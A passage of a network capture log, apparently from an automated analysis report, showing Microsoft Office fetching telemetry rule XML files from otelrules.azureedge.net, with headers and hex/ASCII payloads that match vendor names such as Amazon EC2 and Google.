                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                            x-ms-request-id: 9aadc8db-201e-000c-3931-3c79c4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032717Z-178bfbc474b7cbwqhC1NYC8z4n000000026000000000s56a
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            58192.168.2.44988713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                            x-ms-request-id: 8b9ec706-101e-000b-544c-3c5e5c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032717Z-15b8b599d88s6mj9hC1TEBur3000000000m000000000fk2w
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            59192.168.2.44988813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 448
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                            x-ms-request-id: 008bef3b-f01e-001f-677c-3b5dc8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032717Z-174c587ffdfb5q56hC1TEB04kg00000000sg00000000d9rg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            60192.168.2.44988913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 491
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                            x-ms-request-id: 2abfc2a9-b01e-003d-094d-3cd32c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032717Z-15b8b599d889gj5whC1TEBfyk000000000s0000000004zyg
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            61192.168.2.44989013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:17 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                            x-ms-request-id: c4abe473-d01e-008e-4d67-3b387a000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032717Z-178bfbc474b9fdhphC1NYCac0n000000027000000000nsdt
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:17 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            62192.168.2.44989113.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                            x-ms-request-id: 79b51860-701e-0021-623a-3c3d45000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032719Z-174c587ffdfp4vpjhC1TEBybqw00000000xg0000000050cq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            63192.168.2.44989213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 4ec76ea5-a01e-006f-014e-3c13cd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032719Z-178bfbc474bscnbchC1NYCe7eg00000002kg000000008asc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            64192.168.2.44989313.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:20 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                            x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032719Z-174c587ffdftv9hphC1TEBm29w00000000rg00000000fmuy
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            65192.168.2.44989513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                            x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032719Z-174c587ffdf4zw2thC1TEBu34000000000zg000000006vz8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:20 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            66192.168.2.44989413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:19 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:19 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                            x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032719Z-178bfbc474bv587zhC1NYCny5w00000002c0000000000xg1
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
